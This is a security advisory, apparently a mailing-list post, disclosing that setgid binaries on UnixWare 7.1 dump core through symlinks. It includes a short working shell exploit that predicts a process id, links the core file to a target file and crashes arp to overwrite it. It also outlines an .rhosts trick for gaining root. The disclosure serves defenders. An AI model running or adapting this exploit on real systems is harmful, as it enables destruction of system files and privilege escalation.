UnixWare coredumps follow symlinks

[btellier () USA NET (Brock Tellier)]

Greetings,

OVERVIEW
Any user may cause system files to be overwritten with coredump data.  A full
root compromise may be possible.

BACKGROUND
All my testing was done on UnixWare 7.1 though I would imagine 7.x is
vulnerable as well.

DETAILS
UnixWare's sgid binaries are allowed to dump core (but suids are not).  By
"calculating" the pid of the sgid binary we will call, we can create a symlink
from ./core.pid to any file which would be writable by the running group. 
Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able
to play around with.  My arp exploit attached below demonstrates how one would
overwrite a file using this vulnerability.

Why is a root compromise possible?  Well, assuming that we could somehow get
"+ +" on a line by itself in the corefile, we could place this into the
.rhosts file of some group writable directory/.rhosts.  Gaining the additional
privileges of any system account is usually a fast ticket to root.

EXPLOIT 

#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial.  Any sgid program which will coredump can be used
# -Brock Tellier, btellier () usa net
####
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print 'A' x 10000"`

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1